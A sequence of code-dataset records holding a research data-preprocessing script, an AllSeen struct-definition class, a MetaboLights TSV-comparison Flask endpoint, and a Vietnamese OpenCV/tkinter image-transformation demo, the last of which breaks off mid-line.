data_dict[device][sub]['gyro']['index'][gyro_in]\n data_dict[device][sub]['gyro']['time'] = data_dict[device][sub]['gyro']['time'][gyro_in]\n data_dict[device][sub]['gyro']['meas'] = data_dict[device][sub]['gyro']['meas'][gyro_in]\n data_dict[device][sub]['gyro']['label'] = data_dict[device][sub]['gyro']['label'][gyro_in]\n data_dict[device][sub]['acc']['index'] = data_dict[device][sub]['acc']['index'][acc_in]\n data_dict[device][sub]['acc']['time'] = data_dict[device][sub]['acc']['time'][acc_in]\n data_dict[device][sub]['acc']['meas'] = data_dict[device][sub]['acc']['meas'][acc_in]\n data_dict[device][sub]['acc']['label'] = data_dict[device][sub]['acc']['label'][acc_in]\n\n gyro_in = np.argwhere(data_dict[device][sub]['gyro']['label'] != 6)[:,0]\n acc_in = np.argwhere(data_dict[device][sub]['acc']['label'] != 6)[:,0]\n\n data_dict[device][sub]['gyro']['index'] = data_dict[device][sub]['gyro']['index'][gyro_in]\n data_dict[device][sub]['gyro']['time'] = data_dict[device][sub]['gyro']['time'][gyro_in]\n data_dict[device][sub]['gyro']['meas'] = data_dict[device][sub]['gyro']['meas'][gyro_in,:]\n data_dict[device][sub]['gyro']['label'] = data_dict[device][sub]['gyro']['label'][gyro_in]\n data_dict[device][sub]['acc']['index'] = data_dict[device][sub]['acc']['index'][acc_in]\n data_dict[device][sub]['acc']['time'] = data_dict[device][sub]['acc']['time'][acc_in]\n data_dict[device][sub]['acc']['meas'] = data_dict[device][sub]['acc']['meas'][acc_in,:]\n data_dict[device][sub]['acc']['label'] = data_dict[device][sub]['acc']['label'][acc_in]\n\n ## Scale data\n data_dict[device][sub]['gyro']['meas'] = scale(data_dict[device][sub]['gyro']['meas'])\n data_dict[device][sub]['acc']['meas'] = scale(data_dict[device][sub]['acc']['meas'])\n\n # Resample and split the data here\n idx = 0\n data = np.zeros((0,500,6))\n labels = np.zeros((0,1))\n while True:\n if idx >= len(data_dict[device][sub]['gyro']['time'])-1:\n break\n start_time = data_dict[device][sub]['gyro']['time'][idx]\n gyro_in = np.argwhere( np.logical_and( start_time <= data_dict[device][sub]['gyro']['time'], \n data_dict[device][sub]['gyro']['time'] <= start_time+5000))[:,0]\n acc_in = np.argwhere( np.logical_and( start_time <= data_dict[device][sub]['acc']['time'],\n data_dict[device][sub]['acc']['time'] <= start_time+5000))[:,0]\n print(len(gyro_in), len(acc_in))\n \n if len(gyro_in) == 0 or len(acc_in) == 0:\n # print(\"time not intersecting segment\")\n idx += len(gyro_in)\n continue \n if data_dict[device][sub]['gyro']['time'][gyro_in][-1] - data_dict[device][sub]['gyro']['time'][gyro_in][0] < 4900 or data_dict[device][sub]['acc']['time'][acc_in][-1] - data_dict[device][sub]['acc']['time'][acc_in][0] < 4900:\n # print(\"end on break segment\")\n idx += len(gyro_in)\n continue\n if len(np.argwhere(np.diff(data_dict[device][sub]['gyro']['time'][gyro_in]) > 200)[:,0]) > 0 :\n diff = np.argwhere(np.diff(data_dict[device][sub]['gyro']['time'][gyro_in]) > 200)[:,0]\n # print(\"gyro contains a break\")\n idx += diff[-1]+1\n continue\n if len(np.argwhere(np.diff(data_dict[device][sub]['acc']['time'][acc_in]) > 200)[:,0]) > 0:\n diff = np.argwhere(np.diff(data_dict[device][sub]['acc']['time'][acc_in]) > 200)[:,0]\n # print(\"acc contains a break\")\n idx += diff[-1]+1\n continue\n start_label = data_dict[device][sub]['gyro']['label'][idx]\n if len(np.argwhere(data_dict[device][sub]['gyro']['label'][gyro_in] != start_label)[:,0]) > 0:\n labels_diff = np.argwhere(data_dict[device][sub]['gyro']['label'][gyro_in] != start_label)[:,0]\n # print(\"label switch in sequence\")\n idx += labels_diff[0]+1\n continue\n \n idx += len(gyro_in)\n\n time = np.linspace(start = data_dict[device][sub]['gyro']['time'][gyro_in][0], stop=data_dict[device][sub]['gyro']['time'][gyro_in][-1], num=500)\n gyro_dat = resample(data_dict[device][sub]['gyro']['meas'][gyro_in, :], 500)\n acc_dat = resample(data_dict[device][sub]['acc']['meas'][acc_in, :], 500)\n\n all_dat = np.concatenate((acc_dat, gyro_dat), axis=1)\n data = np.concatenate((data, np.expand_dims(all_dat, axis=0)), axis=0)\n labels = np.concatenate((labels, np.expand_dims(data_dict[device][sub]['gyro']['label'][gyro_in][0:1], axis=0)), axis=0)\n \n env = device_env_mapping[device]\n\n with h5py.File(os.path.join(flags.data_path, 'HAR/HAR.h5'), 'a') as hf:\n if env not in hf.keys():\n g = hf.create_group(env)\n g.create_dataset('data', data=data.astype('float32'), dtype='float32', maxshape=(None, 500, 6))\n g.create_dataset('labels', data=labels.astype('float32'), dtype='int_', maxshape=(None,1))\n else:\n hf[env]['data'].resize((hf[env]['data'].shape[0] + data.shape[0]), axis = 0)\n hf[env]['data'][-data.shape[0]:,:,:] = data\n hf[env]['labels'].resize((hf[env]['labels'].shape[0] + labels.shape[0]), axis = 0)\n hf[env]['labels'][-labels.shape[0]:,:] = labels\n\ndef LSA64(flags):\n \"\"\" Fetch the LSA64 dataset and preprocess it\n\n Note:\n You need to manually download the HAR dataset from the source and place it in the data folder in order to preprocess it yourself:\n\n https://mega.nz/file/FQJGCYba#uJKGKLW1VlpCpLCrGVu89wyQnm9b4sKquCOEAjW5zMo\n\n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n\n for person in range(1,11):\n person_ID = str(person).zfill(3)\n \n for i, file in enumerate(glob.glob(os.path.join(flags.data_path, 'LSA64', '*_'+person_ID+'_*'))):\n print(str(i+1)+ ' / 320 (' + file+')')\n ID = file.split('/')[-1].split('_')\n sample_num = ID[-1].split('.')[0]\n \n vid = torchvision.io.read_video(os.path.join(flags.data_path, 'LSA64', file), end_pts=2.5, pts_unit='sec')[0]\n\n transform = Compose([ToTensorVideo(),\n Resize(size=(224, 224)),\n UniformTemporalSubsample(20)])#,\n # NormalizeVideo(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])])\n vid = transform(vid)\n\n if not os.path.exists(os.path.join(flags.data_path, 'LSA64', ID[1])):\n os.makedirs(os.path.join(flags.data_path, 'LSA64', ID[1]))\n if not os.path.exists(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0])):\n os.makedirs(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0]))\n if not os.path.exists(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0], sample_num)):\n os.mkdir(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0], sample_num))\n for frame in range(vid.shape[1]):\n torchvision.utils.save_image(vid[:,frame,...], os.path.join(flags.data_path, 'LSA64', ID[1], ID[0], sample_num, 'frame_'+str(frame).zfill(6)+'.jpg'))\n\nclass MI():\n '''\n This class helps to download and prepare MI datasets\n \n '''\n\n def __init__(self,flags):\n super(MI, self).__init__()\n\n self.path = flags.data_path\n\n print('Downloading MI datasets')\n mne.set_config('MNE_DATASETS_BNCI_PATH', self.path)\n utils.set_download_dir(self.path)\n\n # Datasets\n ds_src1 = Cho2017()\n ds_src2 = PhysionetMI()\n ds_src3 = BNCI2014001()\n\n fmin, fmax = 4, 32\n raw = ds_src3.get_data(subjects=[1])[1]['session_T']['run_1']\n src3_channels = raw.pick_types(eeg=True).ch_names\n sfreq = 250.\n prgm_2classes = MotorImagery(n_classes=2, channels=src3_channels, resample=sfreq, fmin=fmin, fmax=fmax)\n prgm_4classes = MotorImagery(n_classes=4, channels=src3_channels, resample=sfreq, fmin=fmin, fmax=fmax)\n\n print(\"Fetching data\")\n X_src1, label_src1, m_src1 = prgm_2classes.get_data(dataset=ds_src1, subjects=[subj for subj in range(1,53) if subj not in [32,46,49]]) # three subjects [32,46,49] were removed in the moabb implementation (see:http://moabb.neurotechx.com/docs/_modules/moabb/datasets/gigadb.html#Cho2017)\n print(\"First source dataset has {} trials with {} electrodes and {} time samples\".format(*X_src1.shape))\n print (\"\\nSource dataset 1 include labels: {}\".format(np.unique(label_src1)))\n X_src2, label_src2, m_src2 = prgm_4classes.get_data(dataset=ds_src2, subjects=list(range(1,110))) \n print(\"Second source dataset has {} trials with {} electrodes and {} time samples\".format(*X_src2.shape))\n print (\"Source dataset 2 include labels: {}\".format(np.unique(label_src2)))\n X_src3, label_src3, m_src3 = prgm_4classes.get_data(dataset=ds_src3, subjects=list(range(1,10))) \n print(\"Third source dataset has {} trials with {} electrodes and {} time samples\".format(*X_src3.shape))\n print (\"Source dataset 3 include labels: {}\".format(np.unique(label_src3)))\n\n y_src1 = np.array([self.relabel(l) for l in label_src1])\n y_src2 = np.array([self.relabel(l) for l in label_src2])\n y_src3 = np.array([self.relabel(l) for l in label_src3])\n\n print(\"Only right-/left-hand labels are used and first source dataset does not have other labels:\")\n print(np.unique(y_src1), np.unique(y_src2), np.unique(y_src3)) \n\n # Deleting trials of \"other labels\"\n print(\"Deleting trials from 'other labels'\")\n X_src2 = np.delete(X_src2,y_src2==2,0)\n y_src2 = np.delete(y_src2,y_src2==2,0)\n X_src3 = np.delete(X_src3,y_src3==2,0)\n y_src3 = np.delete(y_src3,y_src3==2,0)\n\n ## windowing trails\n window_size = min(X_src1.shape[2], X_src2.shape[2], X_src3.shape[2])\n X_src1 = X_src1[:, :, :window_size]\n X_src2 = X_src2[:, :, :window_size]\n X_src3 = X_src3[:, :, :window_size]\n\n ## Create group in h5 file\n dummy_data = np.zeros((0,window_size,len(src3_channels)))\n dummy_labels = np.zeros((0,1))\n groups = ['Cho2017', 'PhysionetMI', 'BNCI2014001']\n X = [X_src1, X_src2, X_src3]\n Y = [y_src1, y_src2, y_src3]\n with h5py.File(os.path.join(self.path, 'MI.h5'), 'a') as hf:\n for g in groups:\n g = hf.create_group(g)\n g.create_dataset('data', data=dummy_data.astype('float32'), dtype='float32', maxshape=(None, window_size, len(src3_channels)))\n g.create_dataset('labels', data=dummy_labels.astype('float32'), dtype='int_', maxshape=(None,1))\n \n ## Save data to h5 file\n for group, x, y in zip(groups,X,Y):\n with h5py.File(os.path.join(self.path, 'MI.h5'), 'a') as hf:\n hf[group]['data'].resize((hf[group]['data'].shape[0] + x.shape[0]), axis = 0)\n hf[group]['data'][-x.shape[0]:,:,:] = x.transpose((0,2,1))\n hf[group]['labels'].resize((hf[group]['labels'].shape[0] + y.shape[0]), axis = 0)\n hf[group]['labels'][-y.shape[0]:,:] = y.reshape([-1,1])\n \n def relabel(self,l):\n \"\"\" Converts labels from str to int \"\"\"\n if l == 'left_hand': return 0\n elif l == 'right_hand': return 1\n else: return 2\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Download datasets')\n parser.add_argument('dataset', nargs='*', type=str, default=DATASETS)\n parser.add_argument('--data_path', type=str, default='~/Documents/Data/')\n flags = parser.parse_args()\n\n print('Flags:')\n for k,v in sorted(vars(flags).items()):\n print(\"\\t{}: {}\".format(k, v))\n\n if 'CAP' in flags.dataset:\n CAP(flags)\n\n if 'SEDFx' in flags.dataset:\n SEDFx(flags)\n \n if 'MI' in flags.dataset:\n MI(flags)\n\n if 'RealizedVolatility' in flags.dataset:\n RealizedVolatility(flags)\n\n if 'HAR' in flags.dataset:\n HAR(flags)\n\n if 'LSA64' in flags.dataset:\n LSA64(flags)","sub_path":"woods/scripts/fetch_and_preprocess.py","file_name":"fetch_and_preprocess.py","file_ext":"py","file_size_in_byte":47050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"36430147","text":"# Copyright AllSeen Alliance. All rights reserved.\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nimport common\nimport validate\nimport fielddef\n\nclass StructDef:\n \"\"\"Contains the description of a declared structure\"\"\"\n\n def __init__(self):\n \"\"\"Initialize an instance of the StructDef class\"\"\"\n self.name = \"\"\n self.fields = []\n\n return\n\n def parse(self, xml, lax_naming):\n \"\"\"Parse the given struct xml element\"\"\"\n #print(\"Parsing Struct '{0}'\".format(xml.get('name')))\n self.name = xml.get('name')\n validate.type_name(self.name)\n\n for fieldnode in xml.findall('field'):\n f = fielddef.FieldDef()\n f.parse(fieldnode, lax_naming)\n self.add_field(fieldnode, f)\n\n return\n\n def add_field(self, xml, field):\n for f in self.fields:\n if f.name == field.name:\n validate.raise_exception(xml,\n \"Duplicate field name '{0}' not allowed.\".format(f.name))\n\n self.fields.append(field)\n return\n\n def get_flattened_signature(self):\n sig = \"(\"\n for field in self.fields:\n sig += field.get_flattened_signature()\n sig += \")\"\n return sig\n\n def get_order(self):\n return len(self.get_flattened_signature())\n\n def get_field_list(self):\n return self.fields\n\n def __str__(self):\n description = \" Name: {0}:\\n\".format(self.name)\n for field in self.fields:\n description += \" {0}\\n\".format(str(field))\n return description\n\n def __eq__(self, other):\n \"\"\"Compares this struct definition to another and returns true if equal.\"\"\"\n if not isinstance(other, StructDef):\n return False\n if other.name != self.name or len(other.fields) != len(self.fields):\n return False\n\n for index in range(len(self.fields)):\n f = self.fields[index]\n other_f = other.fields[index]\n if other_f != f:\n return False\n\n return True\n\n def __ne__(self, other):\n \"\"\"Implements the '!=' operator.\"\"\"\n if self == other:\n return False\n return True\n","sub_path":"src/structdef.py","file_name":"structdef.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"473636050","text":"# EMBL-EBI MetaboLights - https://www.ebi.ac.uk/metabolights\n# Metabolomics team\n#\n# European Bioinformatics Institute (EMBL-EBI), European Molecular Biology Laboratory, Wellcome Genome Campus, Hinxton, Cambridge CB10 1SD, United Kingdom\n#\n# Last modified: 2020-Feb-14\n# Modified by: kenneth\n#\n# Copyright 2020 EMBL - European Bioinformatics Institute\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nimport logging\nimport numpy as np\nimport pandas as pd\n\nfrom flask import request, abort\nfrom flask.json import jsonify\nfrom flask_restful import Resource, reqparse\nfrom flask_restful_swagger import swagger\nfrom app.ws.mtblsWSclient import WsClient\nfrom app.ws.utils import log_request, read_tsv\nfrom app.ws.isaApiClient import IsaApiClient\n\n\nlogger = logging.getLogger('wslog')\nwsc = WsClient()\niac = IsaApiClient()\n\ndef diff_pd(df1, df2):\n # https://stackoverflow.com/questions/17095101/outputting-difference-in-two-pandas-dataframes-side-by-side-highlighting-the-d\n \"\"\"Identify differences between two pandas DataFrames\"\"\"\n assert (df1.columns == df2.columns).all(), \\\n \"DataFrame column names are different\"\n if any(df1.dtypes != df2.dtypes):\n \"Data Types are different, trying to convert\"\n df2 = df2.astype(df1.dtypes)\n if df1.equals(df2):\n return None\n else:\n # need to account for np.nan != np.nan returning True\n diff_mask = (df1 != df2) & ~(df1.isnull() & df2.isnull())\n ne_stacked = diff_mask.stack()\n changed = ne_stacked[ne_stacked]\n changed.index.names = ['id', 'col']\n difference_locations = np.where(diff_mask)\n changed_from = df1.values[difference_locations]\n changed_to = df2.values[difference_locations]\n return pd.DataFrame({'from': changed_from, 'to': changed_to},\n index=changed.index)\n\n\nclass CompareTsvFiles(Resource):\n @swagger.operation(\n summary=\"Find the difference between two tsv (ISA-Tab) files\",\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"Study Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"filename1\",\n \"description\": \"TSV filename one\",\n \"required\": True,\n \"allowEmptyValue\": False,\n \"allowMultiple\": False,\n \"paramType\": \"query\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"filename2\",\n \"description\": \"TSV filename two\",\n \"required\": True,\n \"allowEmptyValue\": False,\n \"allowMultiple\": False,\n \"paramType\": \"query\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK.\"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Study does not exist or your do not have access to this study.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n def get(self, study_id):\n\n log_request(request)\n # param validation\n if study_id is None:\n abort(404)\n study_id = study_id.upper()\n\n # User authentication\n user_token = None\n if 'user_token' in request.headers:\n user_token = request.headers['user_token']\n\n if user_token is None:\n abort(401)\n\n # query validation\n parser = reqparse.RequestParser()\n parser.add_argument('filename1', help='TSV filename one')\n parser.add_argument('filename2', help='TSV filename two')\n assay_filename = None\n if request.args:\n args = parser.parse_args(req=request)\n filename1 = args['filename1'].lower() if args['filename1'] else None\n filename2 = args['filename2'].lower() if args['filename2'] else None\n if not filename1 or not filename2:\n logger.warning(\"Missing TSV filenames.\")\n abort(404, \"Missing TSV filenames.\")\n\n # check for access rights\n is_curator, read_access, write_access, obfuscation_code, study_location, release_date, submission_date, \\\n study_status = wsc.get_permissions(study_id, user_token)\n if not read_access:\n abort(401, \"Study does not exist or your do not have access to this study.\")\n\n location = study_location\n df1 = read_tsv(filename1)\n df2 = read_tsv(filename2)\n diff_df = diff_pd(df1, df2)\n return jsonify({\"entries\": diff_df})\n","sub_path":"app/ws/compare_files.py","file_name":"compare_files.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"181306236","text":"#khai báo các module cần thiết \nfrom PIL import Image, ImageTk #hàm phụ trợ cho giao diện lồng ảnh trong giao diện\nfrom tkinter import Tk, BOTH, Canvas, NW, Frame, Label \nfrom tkinter import messagebox as mbox \nfrom tkinter.ttk import Frame, Button, Style #hàm phụ trợ thiết kế giao diện\nimport cv2 \nimport numpy as np \n\n#khai báo các biến toàn cục\nimg = cv2.imread('twice.jpg')\nrows, cols, ch = img.shape\n\nclass BTL(Frame):\n\tdef __init__(self, parent): #hàm khởi tạo tkinter\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tself.initUI()\n\n\tdef initUI(self): #hàm thiết lập UI\n\t\tself.parent.title('Bài Tập Lớn') #tạo tiêu đề cho khung Tkinter\n\t\tself.pack(fill = BOTH, expand = 1)\n\n\t\tStyle().configure(\"TFrame\", background=\"#333\")\n\n\t\tbard = Image.open(\"logo.png\")\n\t\tbardejov = ImageTk.PhotoImage(bard)\n\t\tlabel1 = Label(self, image = bardejov)\n\t\tlabel1.image = bardejov\n\t\tlabel1.place(x = 0, y = 0)\n\n\t\tintrod = Button(self, text = \"General Introduction\", command = self.onIntro)\n\t\tintrod.grid(padx = 10, pady = 20)\n\t\tintrod.place(x = 150, y = 10)\n\t\tresize = Button(self, text = \"Scaling\", command = self.onResize)\n\t\tresize.grid(row = 1, column = 0)\n\t\tresize.place(x = 170, y = 50)\n\t\ttransl = Button(self, text = \"Translation\", command = self.onTranslation)\n\t\ttransl.grid(row = 2, column = 0)\n\t\ttransl.place(x = 170, y = 80)\n\t\trotate = Button(self, text = \"Rotate\", command = self.onRotate)\n\t\trotate.grid(row = 3, column = 0)\n\t\trotate.place(x = 170, y = 110)\n\t\taffine = Button(self, text = \"Affine Transform\", command = self.onAffine)\n\t\taffine.grid(row = 4, column = 0)\n\t\taffine.place(x = 157, y = 140)\n\t\tperspt = Button(self, text = \"Perspective Transform\", command = self.onPerspect)\n\t\tperspt.grid(row = 5, column = 0)\n\t\tperspt.place(x = 142, y = 170)\n\t\tapplic = Button(self, text = \"Application\", command = self.onApply)\n\t\tapplic.grid(row = 5, column = 0)\n\t\tapplic.place(x = 170, y = 200)\n\t\texit11 = Button(self, text = \"Exit\", command = self.onQuit)\n\t\texit11.grid(row = 6, column = 0)\n\t\texit11.place(x = 170, y = 270)\n\n\tdef onQuit (self): #hàm thoát/ dừng chương trình\n\t\tself.quit()\n\n\tdef onIntro (self): #hàm giới thiệu chung chung =)) mặc dù hong biết cần hong nữa\n\t\tmbox.showinfo(\"Hello everyone!!!\", \"Đây là bài tập lớn của nhóm mình\")\n\n\tdef nothing (x, event = None): #hàm đúng theo tên là nothing =)) \n\t\tpass\n\n\tdef onResize (self): #hàm Scaling trong tài liệu\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_AUTOSIZE)\n\t\tcv2.namedWindow('Resize', cv2.WINDOW_AUTOSIZE)\n\n\t\tcv2.createTrackbar('x', 'Resize', 10, 20, self.nothing)\t\n\t\tcv2.createTrackbar('y', 'Resize', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('Larange', 'Resize', 0, 2, self.nothing)\n\t\tcv2.createTrackbar('mode', 'Resize', 0, 1, self.nothing) #với 0 là chưa chạy, 1 là phóng to, 2 là thu nhỏ\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\n\t\t\tOx = cv2.getTrackbarPos ('x', 'Resize')\n\t\t\tOy = cv2.getTrackbarPos ('y', 'Resize')\n\t\t\tb = cv2.getTrackbarPos ('Larange', 'Resize')\n\t\t\tif b == 0:\n\t\t\t\tb = cv2.INTER_AREA\n\t\t\tif b == 1:\n\t\t\t\tb = cv2.INTER_CUBIC\n\t\t\tif b == 2:\n\t\t\t\tb = cv2.INTER_LINEAR\n\n\t\t\tM1 = cv2.getTrackbarPos ('mode', 'Resize')\n\n\t\t\tOx = Ox/10\n\t\t\tOy = Oy/10\n\n\t\t\tif Ox == 0: \n\t\t\t\tOx = 1/10\n\n\t\t\tif Oy == 0:\n\t\t\t\tOy = 1/10\n\n\t\t\tif M1 == 0:\n\t\t\t\tself.nothing\n\t\t\tif M1 == 1:\n\t\t\t\tim = cv2.resize(img, None, fx = Ox, fy = Oy, interpolation = b)\n\t\tcv2.destroyAllWindows()\n\n\tdef onTranslation (self): #hàm translation\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Translation', cv2.WINDOW_AUTOSIZE)\n\n\t\tcv2.createTrackbar('Zn', 'Translation', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('Oz1', 'Translation', 20, 40, self.nothing)\n\t\tcv2.createTrackbar('Oy', 'Translation', cols, cols*2, self.nothing)#Chỉnh thông số theo số pixel ảnh\n\t\tcv2.createTrackbar('Oz2', 'Translation', 20, 40, self.nothing)\n\t\tcv2.createTrackbar('Zd', 'Translation', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('Ox', 'Translation', rows, rows*2, self.nothing)#Chỉnh thông số theo số pixel ảnh\n\t\t\n\t\tcv2.createTrackbar('switch', 'Translation', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\n\t\t\ta1 = cv2.getTrackbarPos ('Zn', 'Translation')\n\t\t\tb1 = cv2.getTrackbarPos ('Oz1', 'Translation')\n\t\t\ty = cv2.getTrackbarPos ('Oy', 'Translation')\n\t\t\tb2 = cv2.getTrackbarPos ('Oz2', 'Translation')\n\t\t\ta2 = cv2.getTrackbarPos ('Zd', 'Translation')\n\t\t\tx = cv2.getTrackbarPos ('Ox', 'Translation')\n\n\t\t\ts = cv2.getTrackbarPos ('switch','Translation')\n\n\t\t\t#hệ số zoom (ngang, dọc)\n\t\t\ta1 = a1/10\n\t\t\tif a1 == 0:\ta1 = 1/10\n\t\t\ta2 = a2/10\n\t\t\tif a2 == 0:\ta2 = 1/10\n\n\t\t\t#hệ số trục Oz Có thể chỉnh thêm nếu muốn\n\t\t\tb1 = (b1-20)/10 \n\t\t\tb2 = (b2-20)/10\n\n\t\t\t#hệ số trục tọa độ\n\t\t\ty = y - cols\n\t\t\tx = x - rows\n\n\t\t\tM = np.float32([[a1, b1, y], [b2, a2, x]])\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpAffine (img, M, (cols, rows))\n\t\tcv2.destroyAllWindows()\n\n\tdef onRotate (self): #hàm Rotate\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Rotate', cv2.WINDOW_AUTOSIZE)\n\n\t\tcv2.createTrackbar('alpha', 'Rotate', 360, 720, self.nothing)\n\t\tcv2.createTrackbar('Width', 'Rotate', int(cols/2), cols, self.nothing)\n\t\tcv2.createTrackbar('Height', 'Rotate', int(rows/2), rows, self.nothing)\n\t\tcv2.createTrackbar('Zoom', 'Rotate', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('switch', 'Rotate', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\n\t\t\ta = cv2.getTrackbarPos ('alpha', 'Rotate')\n\t\t\tb = cv2.getTrackbarPos ('Zoom', 'Rotate')\n\t\t\tc = cv2.getTrackbarPos ('width', 'Rotate')\n\t\t\td = cv2.getTrackbarPos ('height', 'Rotate')\n\t\t\ts = cv2.getTrackbarPos ('switch','Rotate')\n\n\t\t\ta = a - 360\n\t\t\tb = b / 10\n\t\t\tif b == 0:\n\t\t\t\tb = 1/10\n\n\t\t\tM1 = cv2.getRotationMatrix2D ((c, d), a, b)# hệ số cuối là hệ số zoom\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpAffine (img, M1, (cols, rows))\n\t\tcv2.destroyAllWindows()\n\n\tdef onAffine (self): #hàm Afine\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Affine', cv2.WINDOW_NORMAL)\n\n\t\t#theo lý thuyết thì đây là 3 điểm đầu vào\n\t\tcv2.createTrackbar('a1', 'Affine', 50, rows, self.nothing)\n\t\tcv2.createTrackbar('a2', 'Affine', 50, cols, self.nothing)\n\t\tcv2.createTrackbar('b1', 'Affine', 200, rows, self.nothing) \n\t\tcv2.createTrackbar('b2', 'Affine', 50, cols, self.nothing)\n\t\tcv2.createTrackbar('c1', 'Affine', 50, rows, self.nothing)\n\t\tcv2.createTrackbar('c2', 'Affine', 200, cols, self.nothing)\n\n\t\t#3 điểm đầu ra #lưu ý mốt đổi rows vs cows lại với nhau\n\t\tcv2.createTrackbar('d1', 'Affine', rows, 2*rows, self.nothing)\n\t\tcv2.createTrackbar('d2', 'Affine', cols, 2*cols, self.nothing)\n\t\tcv2.createTrackbar('e1', 'Affine', rows, 2*rows, self.nothing)\n\t\tcv2.createTrackbar('e2', 'Affine', cols, 2*cols, self.nothing)\n\t\tcv2.createTrackbar('f1', 'Affine', rows, 2*rows, self.nothing)\n\t\tcv2.createTrackbar('f2', 'Affine', cols, 2*cols, self.nothing)\n\n\t\tswitch = \"0: OFF\" + \"\\n1:Affine\"\n\t\tcv2.createTrackbar(switch, 'Affine', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\t\tbreak\n\n\t\t\ta1 = cv2.getTrackbarPos ('a1', 'Affine')\n\t\t\ta2 = cv2.getTrackbarPos ('a2', 'Affine')\n\t\t\tb1 = cv2.getTrackbarPos ('b1', 'Affine')\n\t\t\tb2 = cv2.getTrackbarPos ('b1', 'Affine')\n\t\t\tc1 = cv2.getTrackbarPos ('c1', 'Affine')\n\t\t\tc2 = cv2.getTrackbarPos ('c2', 'Affine')\n\n\t\t\td1 = cv2.getTrackbarPos ('d1', 'Affine')\n\t\t\td1 = d1 - rows\n\t\t\td2 = cv2.getTrackbarPos ('d2', 'Affine')\n\t\t\td2 = d2 - cols\n\t\t\te1 = cv2.getTrackbarPos ('e1', 'Affine')\n\t\t\te1 = e1 - rows\n\t\t\te2 = cv2.getTrackbarPos ('e2', 'Affine')\n\t\t\te2 = e2 - cols\n\t\t\tf1 = cv2.getTrackbarPos ('f1', 'Affine')\n\t\t\tf1 = f1 - rows\n\t\t\tf2 = cv2.getTrackbarPos ('f2', 'Affine')\n\t\t\tf2 = f2 - cols\n\n\t\t\ts = cv2.getTrackbarPos (switch, 'Affine')\n\n\t\t\t#số liệu cho Affine\n\t\t\tpts1 = np.float32([[a1, a2], [b1, b2], [c1, c2]])\n\t\t\tpts2 = np.float32([[d1, d2], [e1, e2], [f1, 